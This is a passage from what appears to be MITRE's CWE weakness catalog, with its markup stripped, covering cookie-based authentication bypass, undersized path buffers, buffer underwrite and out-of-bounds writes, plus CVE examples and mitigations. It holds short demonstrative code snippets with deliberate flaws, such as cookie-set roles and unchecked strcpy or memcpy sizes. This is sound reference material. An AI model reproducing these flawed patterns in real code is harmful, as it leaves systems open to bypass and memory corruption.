ensure that it is greater than zero to avoid a potential divide by zero error (CWE-369). + + + + + CVE-2008-2516 + Authentication module allows authentication bypass because it uses "(x = call(args) == SUCCESS)" instead of "((x = call(args)) == SUCCESS)". + https://www.cve.org/CVERecord?id=CVE-2008-2516 + + + CVE-2008-0599 + Chain: Language interpreter calculates wrong buffer size (CWE-131) by using "size = ptr ? X : Y" instead of "size = (ptr ? X : Y)" expression. + https://www.cve.org/CVERecord?id=CVE-2008-0599 + + + CVE-2001-1155 + Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions. + https://www.cve.org/CVERecord?id=CVE-2001-1155 + + + + + EXP00-C + Use parentheses for precedence of operation + Exact + + + EXP04-PL + Do not mix the early-precedence logical operators with late-precedence logical operators + CWE More Abstract + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2009-07-16 + 1.5 + 2009-07-27 + + + CWE Content Team + MITRE + 2009-12-28 + updated Observed_Examples + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings, Time_of_Introduction + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a protection mechanism that relies on the existence or values of a cookie, but it does not properly ensure that the cookie is valid for the associated user. + Attackers can easily modify cookies, within the browser or by implementing the client-side code outside of the browser. Attackers can bypass protection mechanisms such as authorization and authentication by modifying the cookie to contain an expected value. + + + + + + + + + + + Implementation + + + High + + + Access Control + Bypass Protection Mechanism + Gain Privileges or Assume Identity + It is dangerous to use cookies to set a user's privileges. The cookie can be manipulated to claim a high level of authorization, or to claim that successful authentication has occurred. + + + + + Architecture and Design + Avoid using cookie data for a security-related decision. + + + Implementation + Perform thorough input validation (i.e.: server side validation) on the cookie data if you're going to use it for a security related decision. + + + Architecture and Design + Add integrity checks to detect tampering. + + + Architecture and Design + Protect critical cookies from replay attacks, since cross-site scripting or other attacks may allow attackers to steal a strongly-encrypted cookie that also passes integrity checks. This mitigation applies to cookies that should only be valid during a single transaction or session. By enforcing timeouts, you may limit the scope of an attack. As part of your integrity check, use an unpredictable, server-side value that is not exposed to the client. + + + + + The following code excerpt reads a value from a browser cookie to determine the role of the user. + + Cookie[] cookies = request.getCookies();for (int i =0; i< cookies.length; i++) {Cookie c = cookies[i];if (c.getName().equals("role")) {userRole = c.getValue();}} + + + + The following code could be for a medical records application. It performs authentication by checking if a cookie has been set. + + $auth = $_COOKIES['authenticated'];if (! $auth) {if (AuthenticateUser($_POST['user'], $_POST['password']) == "success") {// save the cookie to send out in future responsessetcookie("authenticated", "1", time()+60*60*2);}else {ShowLoginScreen();die("\n");}}DisplayMedicalHistory($_POST['patient_ID']); + + The programmer expects that the AuthenticateUser() check will always be applied, and the "authenticated" cookie will only be set when authentication succeeds. The programmer even diligently specifies a 2-hour expiration for the cookie. + However, the attacker can set the "authenticated" cookie to a non-zero value such as 1. As a result, the $auth variable is 1, and the AuthenticateUser() check is not even performed. The attacker has bypassed the authentication. + + + In the following example, an authentication flag is read from a browser cookie, thus allowing for external control of user state data. + + Cookie[] cookies = request.getCookies();for (int i =0; i< cookies.length; i++) {Cookie c = cookies[i];if (c.getName().equals("authenticated") && Boolean.TRUE.equals(c.getValue())) {authenticated = true;}} + + + + + + CVE-2009-1549 + Attacker can bypass authentication by setting a cookie to a specific value. + https://www.cve.org/CVERecord?id=CVE-2009-1549 + + + CVE-2009-1619 + Attacker can bypass authentication and gain admin privileges by setting an "admin" cookie to 1. + https://www.cve.org/CVERecord?id=CVE-2009-1619 + + + CVE-2009-0864 + Content management system allows admin privileges by setting a "login" cookie to "OK." + https://www.cve.org/CVERecord?id=CVE-2009-0864 + + + CVE-2008-5784 + e-dating application allows admin privileges by setting the admin cookie to 1. + https://www.cve.org/CVERecord?id=CVE-2008-5784 + + + CVE-2008-6291 + Web-based email list manager allows attackers to gain admin privileges by setting a login cookie to "admin." + https://www.cve.org/CVERecord?id=CVE-2008-6291 + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + A new parent might need to be defined for this entry. This entry is specific to cookies, which reflects the significant number of vulnerabilities being reported for cookie-based authentication in CVE during 2008 and 2009. However, other types of inputs - such as parameters or headers - could also be used for similar authentication or authorization. Similar issues (under the Research view) include CWE-247 and CWE-472. + + + + CWE Content Team + MITRE + 2009-07-16 + 1.5 + 2009-07-27 + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Modes_of_Introduction, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product invokes a function for normalizing paths or file names, but it provides an output buffer that is smaller than the maximum possible size, such as PATH_MAX. + Passing an inadequately-sized output buffer to a path manipulation function can result in a buffer overflow. Such functions include realpath(), readlink(), PathAppend(), and others. + + + + + + + + + + + Windows provides a large number of utility functions that manipulate buffers containing filenames. In most cases, the result is returned in a buffer that is passed in as input. (Usually the filename is modified in place.) Most functions require the buffer to be at least MAX_PATH bytes in length, but you should check the documentation for each function individually. If the buffer is not large enough to store the result of the manipulation, a buffer overflow can occur. + + + + Implementation + + + + + Integrity + Confidentiality + Availability + Modify Memory + Execute Unauthorized Code or Commands + DoS: Crash, Exit, or Restart + + + + + Implementation + Always specify output buffers large enough to handle the maximum-size possible result from path manipulation functions. + + + + + In this example the function creates a directory named "output\<name>" in the current directory and returns a heap-allocated copy of its name. + + char *createOutputDirectory(char *name) { + char outputDirectoryName[128];if (getCurrentDirectory(128, outputDirectoryName) == 0) {return null;}if (!PathAppend(outputDirectoryName, "output")) {return null;}if (!PathAppend(outputDirectoryName, name)) { + + return null; + }if (SHCreateDirectoryEx(NULL, outputDirectoryName, NULL) != ERROR_SUCCESS) { + + return null; + }return StrDup(outputDirectoryName); + } + + For most values of the current directory and the name parameter, this function will work properly. However, if the name parameter is particularly long, then the second call to PathAppend() could overflow the outputDirectoryName buffer, which is smaller than MAX_PATH bytes. + + + + Memory + File or Directory + + + + Often Misused: File System + + + SFP9 + Faulty String Expansion + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry is at a much lower level of abstraction than most entries because it is function-specific. It also has significant overlap with other entries that can vary depending on the perspective. For example, incorrect usage could trigger either a stack-based overflow (CWE-121) or a heap-based overflow (CWE-122). The CWE team has not decided how to handle such entries. + + + + 7 Pernicious Kingdoms + 2009-07-27 + 1.5 + 2009-07-27 + Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified before initial publication. + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + KDM Analytics + 2009-07-17 + Improved the White_Box_Definition + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Affected_Resources, Demonstrative_Examples, Relationships, White_Box_Definitions + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product reads or writes to a buffer using an index or pointer that references a memory location prior to the beginning of the buffer. + This typically occurs when a pointer or its index is decremented to a position before the buffer, when pointer arithmetic results in a position before the beginning of the valid memory location, or when a negative index is used. + + + + + + + + Confidentiality + Read Memory + For an out-of-bounds read, the attacker may have access to sensitive information. If the sensitive information contains system details, such as the current buffers position in memory, this knowledge can be used to craft further attacks, possibly with more severe consequences. + + + Integrity + Availability + Modify Memory + DoS: Crash, Exit, or Restart + Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash. + + + Integrity + Modify Memory + Execute Unauthorized Code or Commands + If the corrupted memory can be effectively controlled, it may be possible to execute arbitrary code. If the corrupted memory is data rather than instructions, the system will continue to function with improper changes, possibly in violation of an implicit or explicit policy. + + + + + Fuzzing + Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues. + High + + + + + In the following C/C++ example, a utility function is used to trim trailing whitespace from a character string. The function copies the input string to a local character string and uses a while statement to remove the trailing whitespace by moving backward through the string and overwriting whitespace with a NUL character. + + char* trimTrailingWhitespace(char *strMessage, int length) { + char *retMessage;char *message = malloc(sizeof(char)*(length+1)); + + // copy input string to a temporary string + char message[length+1];int index;for (index = 0; index < length; index++) {message[index] = strMessage[index];}message[index] = '\0'; + + // trim trailing whitespace + int len = index-1;while (isspace(message[len])) {message[len] = '\0';len--;} + + // return string without trailing whitespace + retMessage = message;return retMessage; + } + + However, this function can cause a buffer underwrite if the input character string contains all whitespace. On some systems the while statement will move backwards past the beginning of a character string and will call the isspace() function on an address outside of the bounds of the local buffer. + + + The following example asks a user for an offset into an array to select an item. + + + int main (int argc, char **argv) {char *items[] = {"boat", "car", "truck", "train"};int index = GetUntrustedOffset();printf("You selected %s\n", items[index-1]);} + + The programmer allows the user to specify which element in the list to select, however an attacker can provide an out-of-bounds offset, resulting in a buffer over-read (CWE-126). + + + The following is an example of code that may result in a buffer underwrite, if find() returns a negative value to indicate that ch is not found in srcBuf: + + int main() {...strncpy(destBuf, &srcBuf[find(srcBuf, ch)], 1024);...} + + If the index to srcBuf is somehow under user control, this is an arbitrary write-what-where condition. + + + + + CVE-2002-2227 + Unchecked length of SSLv2 challenge value leads to buffer underflow. + https://www.cve.org/CVERecord?id=CVE-2002-2227 + + + CVE-2007-4580 + Buffer underflow from a small size value with a large buffer (length parameter inconsistency, CWE-130) + https://www.cve.org/CVERecord?id=CVE-2007-4580 + + + CVE-2007-1584 + Buffer underflow from an all-whitespace string, which causes a counter to be decremented before the buffer while looking for a non-whitespace character. + https://www.cve.org/CVERecord?id=CVE-2007-1584 + + + CVE-2007-0886 + Buffer underflow resultant from encoded data that triggers an integer overflow. + https://www.cve.org/CVERecord?id=CVE-2007-0886 + + + CVE-2006-6171 + Product sets an incorrect buffer size limit, leading to "off-by-two" buffer underflow. + https://www.cve.org/CVERecord?id=CVE-2006-6171 + + + CVE-2006-4024 + Negative value is used in a memcpy() operation, leading to buffer underflow. + https://www.cve.org/CVERecord?id=CVE-2006-4024 + + + CVE-2004-2620 + Buffer underflow due to mishandled special characters + https://www.cve.org/CVERecord?id=CVE-2004-2620 + + + + + ARR30-C + Do not form or use out-of-bounds pointers or array subscripts + CWE More Specific + + + + Discouraged + The CWE entry might be misused when lower-level CWE entries might be available. It also overlaps existing CWE entries and might be deprecated in the future. + If the "Access" operation is known to be a read or a write, then investigate children of entries such as CWE-787: Out-of-bounds Write and CWE-125: Out-of-bounds Read. + + + + + + + + CWE Content Team + MITRE + 2009-10-21 + 1.6 + 2009-10-29 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Common_Consequences, Demonstrative_Examples, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product writes data past the end, or before the beginning, of the intended buffer. + Typically, this can result in corruption of data, a crash, or code execution. The product may modify an index or perform pointer arithmetic that references a memory location that is outside of the boundaries of the buffer. A subsequent write operation then produces undefined or unexpected results. + + + + + + + + + + + + + + + Memory Corruption + Often used to describe the consequences of writing to memory outside the bounds of a buffer, or to memory that is invalid, when the root cause is something other than a sequential copy of excessive data from a fixed starting location. This may include issues such as incorrect pointer arithmetic, accessing invalid pointers due to incomplete initialization or memory release, etc. + + + + + Implementation + + + High + + + Integrity + Availability + Modify Memory + DoS: Crash, Exit, or Restart + Execute Unauthorized Code or Commands + + + + + Automated Static Analysis + + This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. + Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges. + + High + Detection techniques for buffer-related errors are more mature than for most other weakness types. + + + Automated Dynamic Analysis + This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. + + + + + Requirements + Language Selection + + Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer. + Be wary that a language's interface to native code may still be subject to overflows, even if the language itself is theoretically safe. + + + + Architecture and Design + Libraries or Frameworks + + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + Examples include the Safe C String Library (SafeStr) by Messier and Viega [REF-57], and the Strsafe.h library from Microsoft [REF-56]. These libraries provide safer versions of overflow-prone string-handling functions. + + This is not a complete solution, since many buffer overflows are not related to strings. + + + Operation + Build and Compilation + Environment Hardening + + Use automatic buffer overflow detection mechanisms that are offered by certain compilers or compiler extensions. Examples include: the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice, which provide various mechanisms including canary-based detection and range/index checking. + D3-SFCV (Stack Frame Canary Validation) from D3FEND [REF-1334] discusses canary-based detection in detail. + + + Defense in Depth + + This is not necessarily a complete solution, since these mechanisms only detect certain types of overflows. In addition, the result is still a denial of service, since the typical response is to exit the application. + + + + Implementation + + Consider adhering to the following rules when allocating and managing an application's memory: + + Double check that the buffer is as large as specified. + When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string. + Check buffer boundaries if accessing the buffer in a loop and make sure there is no danger of writing past the allocated space. + If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions. + + + + + Operation + Build and Compilation + Environment Hardening + + Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code. + Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]. Imported modules may be similarly realigned if their default memory addresses conflict with other modules, in a process known as "rebasing" (for Windows) and "prelinking" (for Linux) [REF-1332] using randomly generated addresses. ASLR for libraries cannot be used in conjunction with prelink since it would require relocating the libraries at run-time, defeating the whole purpose of prelinking. + For more information on these techniques see D3-SAOR (Segment Address Offset Randomization) from D3FEND [REF-1335]. + + Defense in Depth + These techniques do not provide a complete solution. For instance, exploits frequently use a bug that discloses memory addresses in order to maximize reliability of code execution [REF-1337]. It has also been shown that a side-channel attack can bypass ASLR [REF-1333] + + + Operation + Environment Hardening + + Use a CPU and operating system that offers Data Execution Protection (using hardware NX or XD bits) or the equivalent techniques that simulate this feature in software, such as PaX [REF-60] [REF-61]. These techniques ensure that any instruction executed is exclusively at a memory address that is part of the code segment. + For more information on these techniques see D3-PSEP (Process Segment Execution Prevention) from D3FEND [REF-1336]. + + Defense in Depth + This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software's state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application. + + + Implementation + Replace unbounded copy functions with analogous functions that support length arguments, such as strcpy with strncpy. Create these if they are not available. + Moderate + This approach is still susceptible to calculation errors, including issues such as off-by-one errors (CWE-193) and incorrectly calculating buffer lengths (CWE-131). + + + + + The following code attempts to save four different identification numbers into an array. + + int id_sequence[3]; + /* Populate the id array. */ + id_sequence[0] = 123;id_sequence[1] = 234;id_sequence[2] = 345;id_sequence[3] = 456; + + Since the array is only allocated to hold three elements, the valid indices are 0 to 2; so, the assignment to id_sequence[3] is out of bounds. + + + In the following code, it is possible to request that memcpy move a much larger segment of memory than assumed: + + int returnChunkSize(void *) { + + + /* if chunk info is valid, return the size of usable memory, + + + * else, return -1 to indicate an error + + + */ + ... + }int main() {...memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));...} + + If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788). + + + This code takes an IP address from the user and verifies that it is well formed. It then looks up the hostname and copies it into a buffer. + + void host_lookup(char *user_supplied_addr){ + struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp); + + /*routine that ensures user_supplied_addr is in the right format for conversion */ + + validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name); + } + + This function allocates a buffer of 64 bytes to store the hostname. However, there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker. + Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476). + + + This code applies an encoding procedure to an input string and stores it into a buffer. + + char * copy_input(char *user_supplied_string){ + int i, dst_index;char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);if ( MAX_SIZE <= strlen(user_supplied_string) ){die("user string too long, die evil hacker!");}dst_index = 0;for ( i = 0; i < strlen(user_supplied_string); i++ ){ + if( '&' == user_supplied_string[i] ){dst_buf[dst_index++] = '&';dst_buf[dst_index++] = 'a';dst_buf[dst_index++] = 'm';dst_buf[dst_index++] = 'p';dst_buf[dst_index++] = ';';}else if ('<' == user_supplied_string[i] ){ + + + /* encode to &lt; */ + + + }else dst_buf[dst_index++] = user_supplied_string[i]; + }return dst_buf; + } + + The programmer attempts to encode the ampersand character in the user-controlled string. However, the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands. + + + In the following C/C++ code, a utility function is used to trim trailing whitespace from a character string. The function copies the input string to a local character string and uses a while statement to remove the trailing whitespace by moving backward through the string and overwriting whitespace with a NUL character. + + char* trimTrailingWhitespace(char *strMessage, int length) { + char *retMessage;char *message = malloc(sizeof(char)*(length+1)); + + // copy input string to a temporary string + char message[length+1];int index;for (index = 0; index < length; index++) {message[index] = strMessage[index];}message[index] = '\0'; + + // trim trailing whitespace + int len = index-1;while (isspace(message[len])) {message[len] = '\0';len--;} + + // return string without trailing whitespace + retMessage = message;return retMessage; + } + + However, this function can cause a buffer underwrite if the input character string contains all whitespace. On some systems the while statement will move backwards past the beginning of a character string and will call the isspace() function on an address outside of the bounds of the local buffer. + + + The following code allocates memory for a maximum number of widgets. It then gets a user-specified number of widgets, making sure that the user does not request too many. It then initializes the elements of the array using InitializeWidget(). Because the number of widgets can vary for each request, the code inserts a NULL pointer to signify the location of the last widget. + + int i;unsigned int numWidgets;Widget **WidgetList; + numWidgets = GetUntrustedSizeValue();if ((numWidgets == 0) || (numWidgets > MAX_NUM_WIDGETS)) {ExitError("Incorrect number of widgets requested!");}WidgetList = (Widget **)malloc(numWidgets * sizeof(Widget *));printf("WidgetList ptr=%p\n", WidgetList);for(i=0; i<numWidgets; i++) {WidgetList[i] = InitializeWidget();}WidgetList[numWidgets] = NULL;showWidgets(WidgetList); + + However, this code contains an off-by-one calculation error (CWE-193). It allocates exactly enough space to contain the specified number of widgets, but it does not include the space for the NULL pointer. As a result, the allocated buffer is smaller than it is supposed to be (CWE-131). So if the user ever requests MAX_NUM_WIDGETS, there is an out-of-bounds write (CWE-787) when the NULL is assigned. Depending on the environment and compilation settings, this could cause memory corruption. + + + The following code may result in a buffer underwrite, if find() returns a negative value to indicate that ch is not found in srcBuf: + + int main() {...strncpy(destBuf, &srcBuf[find(srcBuf, ch)], 1024);...} + + If the index to srcBuf is somehow under user control, this is an arbitrary write-what-where condition. + + + + + CVE-2021-21220 + Chain: insufficient input validation (CWE-20) in browser allows heap corruption (CWE-787), as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-21220 + + + CVE-2021-28664 + GPU kernel driver allows memory corruption because a user can obtain read/write access to read-only pages, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-28664 + + + CVE-2020-17087 + Chain: integer truncation (CWE-197) causes small buffer allocation (CWE-131) leading to out-of-bounds write (CWE-787) in kernel pool, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-17087 + + + CVE-2020-1054 + Out-of-bounds write in kernel-mode driver, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-1054 + + + CVE-2020-0041 + Escape from browser sandbox using out-of-bounds write due to incorrect bounds check, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-0041 + + + CVE-2020-0968 + Memory corruption in web browser scripting engine, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-0968 + + + CVE-2020-0022 + chain: mobile phone Bluetooth implementation does not include offset when calculating packet length (CWE-682), leading to out-of-bounds write (CWE-787) + https://www.cve.org/CVERecord?id=CVE-2020-0022 + + + CVE-2019-1010006 + Chain: compiler optimization (CWE-733) removes or modifies code used to detect integer overflow (CWE-190), allowing out-of-bounds write (CWE-787). + https://www.cve.org/CVERecord?id=CVE-2019-1010006 + + + CVE-2009-1532 + malformed inputs cause accesses of uninitialized or previously-deleted objects, leading to memory corruption + https://www.cve.org/CVERecord?id=CVE-2009-1532 + + + CVE-2009-0269 + chain: -1 value from a function call was intended to indicate an error, but is used as an array index instead. + https://www.cve.org/CVERecord?id=CVE-2009-0269 + + + CVE-2002-2227 + Unchecked length of SSLv2 challenge value leads to buffer underflow. + https://www.cve.org/CVERecord?id=CVE-2002-2227 + + + CVE-2007-4580 + Buffer underflow from a small size value with a large buffer (length parameter inconsistency, CWE-130) + https://www.cve.org/CVERecord?id=CVE-2007-4580 + + + CVE-2007-4268 + Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122) + https://www.cve.org/CVERecord?id=CVE-2007-4268 + + + CVE-2009-2550 + Classic stack-based buffer overflow in media player using a long entry in a playlist + https://www.cve.org/CVERecord?id=CVE-2009-2550 + + + CVE-2009-2403 + Heap-based buffer overflow in media player using a long entry in a playlist + https://www.cve.org/CVERecord?id=CVE-2009-2403 + + + + + Part 3-3 + Req SR 3.5 + + + Part 4-1 + Req SI-1 + + + Part 4-1 + Req SI-2 + + + Part 4-1 + Req SVV-1 + + + Part 4-1 + Req SVV-3 + + + Part 4-2 + Req CR 3.5 + + + + + + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2009-10-21 + 1.6 + 2009-10-29 + + + CWE Content Team + MITRE + 2010-02-16 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2014-06-23 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Description + + + CWE Content Team + MITRE + 2019-09-19 + updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Observed_Examples, Potential_Mitigations, References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2020-02-24 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Observed_Examples + + + CWE Content Team + MITRE + 2020-08-20 + updated Alternate_Terms, Demonstrative_Examples, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-07-20 + updated Demonstrative_Examples, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-01-31 + updated Alternate_Terms, Demonstrative_Examples, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships, Taxonomy_Mappings + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-04-25 + Suggested mappings to ISA/IEC 62443. + + + + + The product reads or writes to a buffer using an index or pointer that references a memory location after the end of the buffer. + This typically occurs when a pointer or its index is incremented to a position after the buffer; or when pointer arithmetic results in a position after the buffer. + + + + + + + + Confidentiality + Read Memory + For an out-of-bounds read, the attacker may have access to sensitive information. If the sensitive information contains system details, such as the current buffers position in memory, this knowledge can be used to craft further attacks, possibly with more severe consequences. + + + Integrity + Availability + Modify Memory + DoS: Crash, Exit, or Restart + Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop. + + + Integrity + Modify Memory + Execute Unauthorized Code or Commands + If the memory accessible by the attacker can be effectively controlled, it may be possible to execute arbitrary code, as with a standard buffer overflow. If the attacker can overwrite a pointer's worth of memory (usually 32 or 64 bits), they can redirect a function pointer to their own malicious code. Even when the attacker can only modify a single byte arbitrary code execution can be possible. Sometimes this is because the same problem can be exploited repeatedly to the same effect. Other times it is because the attacker can overwrite security-critical application-specific data -- such as a flag indicating whether the user is an administrator. + + + + + Fuzzing + Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues. + High + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer. + + void host_lookup(char *user_supplied_addr){ + struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp); + + /*routine that ensures user_supplied_addr is in the right format for conversion */ + + validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), 